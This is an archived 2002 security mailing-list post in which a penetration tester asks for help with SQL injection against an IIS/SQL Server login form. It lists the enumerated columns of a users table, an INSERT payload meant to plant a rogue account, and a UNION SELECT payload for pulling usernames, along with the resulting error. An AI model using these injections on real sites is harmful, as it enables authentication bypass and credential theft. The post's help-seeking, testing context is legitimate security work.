sql table data enumeration help please.

From: Gary O'leary-Steele (GaryO@sec-1.com)
Date: Thu May 09 2002 - 12:47:43 PDT

Next message: Chris Reining: "Re: DID Range Enumeration"

Previous message: Akatosh: "Re: DID Range Enumeration"
Next in thread: Kevin Spett: "Re: sql table data enumeration help please."
Reply: Kevin Spett: "Re: sql table data enumeration help please."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all,


I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data


tblusers.ID				uniqueidentifier
tblusers.createdtimestamp	smalldatetime
tblusers.sessionID		nvarchar
tblUsers.LastUpdated		smalldatetime
tblUsers.LastUpdatedIP		nvarchar
tblUsers.LastUpdatedBy		uniqueidentifier
tblUsers.CompanyType		nvarchar
tblUsers.CompanyID		uniqueidentifier
tblUsers.Password			nvarchar
tblUsers.UserName			nvarchar
tblUsers.Title			nvarchar
tblUsers.Surname			nvarchar
tblUsers.Forename			nvarchar
tblUsers.AddressTo		nvarchar
tblUsers.Appointment		nvarchar
tblUsers.DirectPhone		nvarchar
tblUsers.Mobile			nvarchar
tblUsers.DirectEmail		nvarchar
tblUsers.DirectFax		nvarchar
tblUsers.Signature		The text, ntext, and image data types are invalid in
this subquery or aggregate expression.
tblUsers.Address1		nvarchar
tblUsers.Address2		nvarchar
tblUsers.Address3		nvarchar
tblUsers.Address4		nvarchar
tblUsers.Address5		nvarchar
tblUsers.PostCode		nvarchar
tblUsers.HomePhone		nvarchar
tblUsers.UserAccess		bit

I want to update the table to bypass the auth screen

I have tried

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo@sec-1.com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy

In an attempt to gain access to data held with the username and password
fields I have tried

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"


Any help would be greatly appreciated


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: Chris Reining: "Re: DID Range Enumeration"
Previous message: Akatosh: "Re: DID Range Enumeration"
Next in thread: Kevin Spett: "Re: sql table data enumeration help please."
Reply: Kevin Spett: "Re: sql table data enumeration help please."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu May 09 2002 - 14:12:06 PDT